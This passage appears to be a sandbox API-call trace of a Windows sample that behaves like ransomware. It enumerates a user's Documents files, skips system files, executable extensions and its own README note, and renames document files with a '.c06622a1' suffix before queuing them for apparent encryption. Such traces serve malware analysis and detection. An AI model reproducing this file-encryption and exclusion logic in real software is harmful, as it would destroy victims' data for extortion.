(_Str1="sql", _Str2="pps") returned 3 [0149.275] wcslen (_String="sql") returned 0x3 [0149.275] _wcsicmp (_Str1="sqlite", _Str2="pps") returned 3 [0149.275] wcslen (_String="sqlite") returned 0x6 [0149.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 0x10 [0149.275] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.275] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" [0149.275] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned 0x3a [0149.275] wcscpy (in: _Dest=0x453011e, _Source="OVOG9EZGH62tetjqqe.pps" | out: _Dest="OVOG9EZGH62tetjqqe.pps") returned="OVOG9EZGH62tetjqqe.pps" [0149.275] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\OVOG9EZGH62tetjqqe.pps", dwFileAttributes=0x80) returned 1 [0149.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\OVOG9EZGH62tetjqqe.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\ovog9ezgh62tetjqqe.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x674 [0149.276] SetFilePointerEx (in: hFile=0x674, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.276] ReadFile (in: hFile=0x674, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.278] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x8b9a1143 [0149.278] RtlComputeCrc32 (PartialCrc=0x1143, Buffer=0x3fe674, Length=0x80) returned 0x7069c430 [0149.278] RtlComputeCrc32 (PartialCrc=0xc430, Buffer=0x3fe674, Length=0x80) returned 0xae84bce4 [0149.278] RtlComputeCrc32 (PartialCrc=0xbce4, Buffer=0x3fe674, Length=0x80) returned 0xfb452b28 [0149.278] RtlComputeCrc32 (PartialCrc=0x2b28, Buffer=0x3fe674, Length=0x80) returned 0x7a732995 [0149.278] CloseHandle (hObject=0x674) returned 1 [0149.278] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.278] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\OVOG9EZGH62tetjqqe.pps" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\OVOG9EZGH62tetjqqe.pps") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\OVOG9EZGH62tetjqqe.pps" [0149.278] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\OVOG9EZGH62tetjqqe.pps") returned 0x51 [0149.278] wcscpy (in: _Dest=0x4540152, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.278] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\OVOG9EZGH62tetjqqe.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\ovog9ezgh62tetjqqe.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\OVOG9EZGH62tetjqqe.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\ovog9ezgh62tetjqqe.pps.c06622a1"), dwFlags=0x8) returned 1 [0149.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\OVOG9EZGH62tetjqqe.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\ovog9ezgh62tetjqqe.pps.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x674 [0149.280] CreateIoCompletionPort (FileHandle=0x674, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.280] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4940020 [0149.285] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a7ce567 [0149.285] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x79ddd72 [0149.285] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x58bb1fc6 [0149.285] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3bc0a4d [0149.285] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3841c610 [0149.285] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x22c2c15f [0149.285] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7ba2e9a0 [0149.285] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x41e017bc [0149.288] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4940094, Length=0x80) returned 0xdcec055d [0149.288] RtlComputeCrc32 (PartialCrc=0x55d, Buffer=0x4940094, Length=0x80) returned 0xac6c81e3 [0149.288] RtlComputeCrc32 (PartialCrc=0x81e3, Buffer=0x4940094, Length=0x80) returned 0x613e4ec0 [0149.288] RtlComputeCrc32 (PartialCrc=0x4ec0, Buffer=0x4940094, Length=0x80) returned 0xcc04690d [0149.288] RtlComputeCrc32 (PartialCrc=0x690d, Buffer=0x4940094, Length=0x80) returned 0x30b22859 [0149.288] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0149.288] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.288] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.289] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd787a2a0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd787a2a0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd787a2a0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.289] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.289] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b9bb3b0, ftCreationTime.dwHighDateTime=0x1d5dcc2, ftLastAccessTime.dwLowDateTime=0xc02ed0d0, ftLastAccessTime.dwHighDateTime=0x1d5df7c, ftLastWriteTime.dwLowDateTime=0xc02ed0d0, ftLastWriteTime.dwHighDateTime=0x1d5df7c, nFileSizeHigh=0x0, nFileSizeLow=0x10898, dwReserved0=0x0, dwReserved1=0x0, cFileName="s_O1k V7wOQ3X-DW6WW.doc", cAlternateFileName="S_O1KV~1.DOC")) returned 1 [0149.289] _wcsicmp (_Str1="s_O1k V7wOQ3X-DW6WW.doc", _Str2="README.c06622a1.TXT") returned 1 [0149.289] wcsstr (_Str="s_O1k V7wOQ3X-DW6WW.doc", _SubStr="README") returned 0x0 [0149.289] _wcsicmp (_Str1="autorun.inf", _Str2="s_O1k V7wOQ3X-DW6WW.doc") returned -18 [0149.289] wcslen (_String="autorun.inf") returned 0xb [0149.289] _wcsicmp (_Str1="boot.ini", _Str2="s_O1k V7wOQ3X-DW6WW.doc") returned -17 [0149.289] wcslen (_String="boot.ini") returned 0x8 [0149.289] _wcsicmp (_Str1="bootfont.bin", _Str2="s_O1k V7wOQ3X-DW6WW.doc") returned -17 [0149.289] wcslen (_String="bootfont.bin") returned 0xc [0149.289] _wcsicmp (_Str1="bootsect.bak", _Str2="s_O1k V7wOQ3X-DW6WW.doc") returned -17 [0149.289] wcslen (_String="bootsect.bak") returned 0xc [0149.289] _wcsicmp (_Str1="desktop.ini", _Str2="s_O1k V7wOQ3X-DW6WW.doc") returned -15 [0149.289] wcslen (_String="desktop.ini") returned 0xb [0149.289] _wcsicmp (_Str1="iconcache.db", _Str2="s_O1k V7wOQ3X-DW6WW.doc") returned -10 [0149.289] wcslen (_String="iconcache.db") returned 0xc [0149.289] _wcsicmp (_Str1="ntldr", _Str2="s_O1k V7wOQ3X-DW6WW.doc") returned -5 [0149.289] wcslen (_String="ntldr") returned 0x5 [0149.289] _wcsicmp (_Str1="ntuser.dat", _Str2="s_O1k V7wOQ3X-DW6WW.doc") returned -5 [0149.289] wcslen (_String="ntuser.dat") returned 0xa [0149.289] _wcsicmp (_Str1="ntuser.dat.log", _Str2="s_O1k V7wOQ3X-DW6WW.doc") returned -5 [0149.289] wcslen (_String="ntuser.dat.log") returned 0xe [0149.289] _wcsicmp (_Str1="ntuser.ini", _Str2="s_O1k V7wOQ3X-DW6WW.doc") returned -5 [0149.289] wcslen (_String="ntuser.ini") returned 0xa [0149.289] _wcsicmp (_Str1="thumbs.db", _Str2="s_O1k V7wOQ3X-DW6WW.doc") returned 1 [0149.289] wcslen (_String="thumbs.db") returned 0x9 [0149.289] _wcsicmp (_Str1="386", _Str2="doc") returned -49 [0149.290] wcslen (_String="386") returned 0x3 [0149.290] _wcsicmp (_Str1="adv", _Str2="doc") returned -3 [0149.290] wcslen (_String="adv") returned 0x3 [0149.290] _wcsicmp (_Str1="ani", _Str2="doc") returned -3 [0149.290] wcslen (_String="ani") returned 0x3 [0149.290] _wcsicmp (_Str1="bat", _Str2="doc") returned -2 [0149.290] wcslen (_String="bat") returned 0x3 [0149.290] _wcsicmp (_Str1="bin", _Str2="doc") returned -2 [0149.290] wcslen (_String="bin") returned 0x3 [0149.290] _wcsicmp (_Str1="cab", _Str2="doc") returned -1 [0149.290] wcslen (_String="cab") returned 0x3 [0149.290] _wcsicmp (_Str1="cmd", _Str2="doc") returned -1 [0149.290] wcslen (_String="cmd") returned 0x3 [0149.290] _wcsicmp (_Str1="com", _Str2="doc") returned -1 [0149.290] wcslen (_String="com") returned 0x3 [0149.290] _wcsicmp (_Str1="cpl", _Str2="doc") returned -1 [0149.290] wcslen (_String="cpl") returned 0x3 [0149.290] _wcsicmp (_Str1="cur", _Str2="doc") returned -1 [0149.290] wcslen (_String="cur") returned 0x3 [0149.290] _wcsicmp (_Str1="deskthemepack", _Str2="doc") returned -10 [0149.290] wcslen (_String="deskthemepack") returned 0xd [0149.290] _wcsicmp (_Str1="diagcab", _Str2="doc") returned -6 [0149.290] wcslen (_String="diagcab") returned 0x7 [0149.290] _wcsicmp (_Str1="diagcfg", _Str2="doc") returned -6 [0149.290] wcslen (_String="diagcfg") returned 0x7 [0149.290] _wcsicmp (_Str1="diagpkg", _Str2="doc") returned -6 [0149.290] wcslen (_String="diagpkg") returned 0x7 [0149.290] _wcsicmp (_Str1="dll", _Str2="doc") returned -3 [0149.290] wcslen (_String="dll") returned 0x3 [0149.290] _wcsicmp (_Str1="drv", _Str2="doc") returned 3 [0149.290] wcslen (_String="drv") returned 0x3 [0149.290] _wcsicmp (_Str1="exe", _Str2="doc") returned 1 [0149.290] wcslen (_String="exe") returned 0x3 [0149.290] _wcsicmp (_Str1="hlp", _Str2="doc") returned 4 [0149.290] wcslen (_String="hlp") returned 0x3 [0149.290] _wcsicmp (_Str1="icl", _Str2="doc") returned 5 [0149.290] wcslen (_String="icl") returned 0x3 [0149.290] _wcsicmp (_Str1="icns", _Str2="doc") returned 5 [0149.291] wcslen (_String="icns") returned 0x4 [0149.291] _wcsicmp (_Str1="ico", _Str2="doc") returned 5 [0149.291] wcslen (_String="ico") returned 0x3 [0149.291] _wcsicmp (_Str1="ics", _Str2="doc") returned 5 [0149.291] wcslen (_String="ics") returned 0x3 [0149.291] _wcsicmp (_Str1="idx", _Str2="doc") returned 5 [0149.291] wcslen (_String="idx") returned 0x3 [0149.291] _wcsicmp (_Str1="ldf", _Str2="doc") returned 8 [0149.291] wcslen (_String="ldf") returned 0x3 [0149.291] _wcsicmp (_Str1="lnk", _Str2="doc") returned 8 [0149.291] wcslen (_String="lnk") returned 0x3 [0149.291] _wcsicmp (_Str1="mod", _Str2="doc") returned 9 [0149.291] wcslen (_String="mod") returned 0x3 [0149.291] _wcsicmp (_Str1="mpa", _Str2="doc") returned 9 [0149.291] wcslen (_String="mpa") returned 0x3 [0149.291] _wcsicmp (_Str1="msc", _Str2="doc") returned 9 [0149.291] wcslen (_String="msc") returned 0x3 [0149.291] _wcsicmp (_Str1="msp", _Str2="doc") returned 9 [0149.291] wcslen (_String="msp") returned 0x3 [0149.291] _wcsicmp (_Str1="msstyles", _Str2="doc") returned 9 [0149.291] wcslen (_String="msstyles") returned 0x8 [0149.291] _wcsicmp (_Str1="msu", _Str2="doc") returned 9 [0149.291] wcslen (_String="msu") returned 0x3 [0149.291] _wcsicmp (_Str1="nls", _Str2="doc") returned 10 [0149.291] wcslen (_String="nls") returned 0x3 [0149.291] _wcsicmp (_Str1="nomedia", _Str2="doc") returned 10 [0149.291] wcslen (_String="nomedia") returned 0x7 [0149.291] _wcsicmp (_Str1="ocx", _Str2="doc") returned 11 [0149.291] wcslen (_String="ocx") returned 0x3 [0149.291] _wcsicmp (_Str1="prf", _Str2="doc") returned 12 [0149.291] wcslen (_String="prf") returned 0x3 [0149.291] _wcsicmp (_Str1="ps1", _Str2="doc") returned 12 [0149.291] wcslen (_String="ps1") returned 0x3 [0149.291] _wcsicmp (_Str1="rom", _Str2="doc") returned 14 [0149.291] wcslen (_String="rom") returned 0x3 [0149.292] _wcsicmp (_Str1="rtp", _Str2="doc") returned 14 [0149.292] wcslen (_String="rtp") returned 0x3 [0149.292] _wcsicmp (_Str1="scr", _Str2="doc") returned 15 [0149.292] wcslen (_String="scr") returned 0x3 [0149.292] _wcsicmp (_Str1="shs", _Str2="doc") returned 15 [0149.292] wcslen (_String="shs") returned 0x3 [0149.292] _wcsicmp (_Str1="spl", _Str2="doc") returned 15 [0149.292] wcslen (_String="spl") returned 0x3 [0149.292] _wcsicmp (_Str1="sys", _Str2="doc") returned 15 [0149.292] wcslen (_String="sys") returned 0x3 [0149.292] _wcsicmp (_Str1="theme", _Str2="doc") returned 16 [0149.292] wcslen (_String="theme") returned 0x5 [0149.292] _wcsicmp (_Str1="themepack", _Str2="doc") returned 16 [0149.292] wcslen (_String="themepack") returned 0x9 [0149.292] _wcsicmp (_Str1="wpx", _Str2="doc") returned 19 [0149.292] wcslen (_String="wpx") returned 0x3 [0149.292] _wcsicmp (_Str1="lock", _Str2="doc") returned 8 [0149.292] wcslen (_String="lock") returned 0x4 [0149.292] _wcsicmp (_Str1="key", _Str2="doc") returned 7 [0149.292] wcslen (_String="key") returned 0x3 [0149.292] _wcsicmp (_Str1="hta", _Str2="doc") returned 4 [0149.292] wcslen (_String="hta") returned 0x3 [0149.292] _wcsicmp (_Str1="msi", _Str2="doc") returned 9 [0149.292] wcslen (_String="msi") returned 0x3 [0149.292] _wcsicmp (_Str1="pdb", _Str2="doc") returned 12 [0149.292] wcslen (_String="pdb") returned 0x3 [0149.292] _wcsicmp (_Str1="sql", _Str2="doc") returned 15 [0149.292] wcslen (_String="sql") returned 0x3 [0149.292] _wcsicmp (_Str1="sqlite", _Str2="doc") returned 15 [0149.292] wcslen (_String="sqlite") returned 0x6 [0149.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 0x10 [0149.292] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.292] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" [0149.292] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned 0x3a [0149.292] wcscpy (in: _Dest=0x453011e, _Source="s_O1k V7wOQ3X-DW6WW.doc" | out: _Dest="s_O1k V7wOQ3X-DW6WW.doc") returned="s_O1k V7wOQ3X-DW6WW.doc" [0149.293] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\s_O1k V7wOQ3X-DW6WW.doc", dwFileAttributes=0x80) returned 1 [0149.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\s_O1k V7wOQ3X-DW6WW.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\s_o1k v7woq3x-dw6ww.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0149.293] SetFilePointerEx (in: hFile=0x624, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.293] ReadFile (in: hFile=0x624, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.294] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x89159ae5 [0149.294] RtlComputeCrc32 (PartialCrc=0x9ae5, Buffer=0x3fe674, Length=0x80) returned 0xedd77a58 [0149.294] RtlComputeCrc32 (PartialCrc=0x7a58, Buffer=0x3fe674, Length=0x80) returned 0xcf791bd [0149.294] RtlComputeCrc32 (PartialCrc=0x91bd, Buffer=0x3fe674, Length=0x80) returned 0x75ac3dc2 [0149.294] RtlComputeCrc32 (PartialCrc=0x3dc2, Buffer=0x3fe674, Length=0x80) returned 0x3dd3700a [0149.294] CloseHandle (hObject=0x624) returned 1 [0149.294] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.294] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\s_O1k V7wOQ3X-DW6WW.doc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\s_O1k V7wOQ3X-DW6WW.doc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\s_O1k V7wOQ3X-DW6WW.doc" [0149.294] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\s_O1k V7wOQ3X-DW6WW.doc") returned 0x52 [0149.294] wcscpy (in: _Dest=0x4540154, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.294] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\s_O1k V7wOQ3X-DW6WW.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\s_o1k v7woq3x-dw6ww.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\s_O1k V7wOQ3X-DW6WW.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\s_o1k v7woq3x-dw6ww.doc.c06622a1"), dwFlags=0x8) returned 1 [0149.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\s_O1k V7wOQ3X-DW6WW.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\s_o1k v7woq3x-dw6ww.doc.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x624 [0149.296] CreateIoCompletionPort (FileHandle=0x624, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.296] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x49d0020 [0149.301] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x12b592a0 [0149.301] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x538c6ac [0149.301] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4e2fc0be [0149.301] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3437b313 [0149.301] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x62ae7f45 [0149.301] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x15e3ba38 [0149.301] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x39fd0d79 [0149.301] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x62bbb339 [0149.304] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x49d0094, Length=0x80) returned 0xaf7df35e [0149.304] RtlComputeCrc32 (PartialCrc=0xf35e, Buffer=0x49d0094, Length=0x80) returned 0x426f97cd [0149.304] RtlComputeCrc32 (PartialCrc=0x97cd, Buffer=0x49d0094, Length=0x80) returned 0x64052583 [0149.304] RtlComputeCrc32 (PartialCrc=0x2583, Buffer=0x49d0094, Length=0x80) returned 0xf98f9106 [0149.304] RtlComputeCrc32 (PartialCrc=0x9106, Buffer=0x49d0094, Length=0x80) returned 0xfa6dd5a4 [0149.304] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0149.305] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.305] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.305] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e773bd0, ftCreationTime.dwHighDateTime=0x1d5df88, ftLastAccessTime.dwLowDateTime=0xf0a89f80, ftLastAccessTime.dwHighDateTime=0x1d5dce2, ftLastWriteTime.dwLowDateTime=0xf0a89f80, ftLastWriteTime.dwHighDateTime=0x1d5dce2, nFileSizeHigh=0x0, nFileSizeLow=0x7af4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ubtm8V.pptx", cAlternateFileName="UBTM8V~1.PPT")) returned 1 [0149.305] _wcsicmp (_Str1="Ubtm8V.pptx", _Str2="README.c06622a1.TXT") returned 3 [0149.305] wcsstr (_Str="Ubtm8V.pptx", _SubStr="README") returned 0x0 [0149.305] _wcsicmp (_Str1="autorun.inf", _Str2="Ubtm8V.pptx") returned -20 [0149.305] wcslen (_String="autorun.inf") returned 0xb [0149.305] _wcsicmp (_Str1="boot.ini", _Str2="Ubtm8V.pptx") returned -19 [0149.305] wcslen (_String="boot.ini") returned 0x8 [0149.305] _wcsicmp (_Str1="bootfont.bin", _Str2="Ubtm8V.pptx") returned -19 [0149.305] wcslen (_String="bootfont.bin") returned 0xc [0149.305] _wcsicmp (_Str1="bootsect.bak", _Str2="Ubtm8V.pptx") returned -19 [0149.305] wcslen (_String="bootsect.bak") returned 0xc [0149.305] _wcsicmp (_Str1="desktop.ini", _Str2="Ubtm8V.pptx") returned -17 [0149.305] wcslen (_String="desktop.ini") returned 0xb [0149.305] _wcsicmp (_Str1="iconcache.db", _Str2="Ubtm8V.pptx") returned -12 [0149.305] wcslen (_String="iconcache.db") returned 0xc [0149.305] _wcsicmp (_Str1="ntldr", _Str2="Ubtm8V.pptx") returned -7 [0149.305] wcslen (_String="ntldr") returned 0x5 [0149.305] _wcsicmp (_Str1="ntuser.dat", _Str2="Ubtm8V.pptx") returned -7 [0149.305] wcslen (_String="ntuser.dat") returned 0xa [0149.305] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Ubtm8V.pptx") returned -7 [0149.305] wcslen (_String="ntuser.dat.log") returned 0xe [0149.305] _wcsicmp (_Str1="ntuser.ini", _Str2="Ubtm8V.pptx") returned -7 [0149.305] wcslen (_String="ntuser.ini") returned 0xa [0149.306] _wcsicmp (_Str1="thumbs.db", _Str2="Ubtm8V.pptx") returned -1 [0149.306] wcslen (_String="thumbs.db") returned 0x9 [0149.306] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0149.306] wcslen (_String="386") returned 0x3 [0149.306] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0149.306] wcslen (_String="adv") returned 0x3 [0149.306] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0149.306] wcslen (_String="ani") returned 0x3 [0149.306] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0149.306] wcslen (_String="bat") returned 0x3 [0149.306] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0149.306] wcslen (_String="bin") returned 0x3 [0149.306] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0149.306] wcslen (_String="cab") returned 0x3 [0149.306] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0149.306] wcslen (_String="cmd") returned 0x3 [0149.307] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0149.307] wcslen (_String="com") returned 0x3 [0149.307] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0149.307] wcslen (_String="cpl") returned 0x3 [0149.307] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0149.307] wcslen (_String="cur") returned 0x3 [0149.307] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0149.307] wcslen (_String="deskthemepack") returned 0xd [0149.307] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0149.307] wcslen (_String="diagcab") returned 0x7 [0149.307] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0149.307] wcslen (_String="diagcfg") returned 0x7 [0149.307] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0149.307] wcslen (_String="diagpkg") returned 0x7 [0149.307] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0149.307] wcslen (_String="dll") returned 0x3 [0149.307] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0149.307] wcslen (_String="drv") returned 0x3 [0149.307] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0149.307] wcslen (_String="exe") returned 0x3 [0149.307] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0149.307] wcslen (_String="hlp") returned 0x3 [0149.307] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0149.307] wcslen (_String="icl") returned 0x3 [0149.307] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0149.307] wcslen (_String="icns") returned 0x4 [0149.307] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0149.307] wcslen (_String="ico") returned 0x3 [0149.308] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 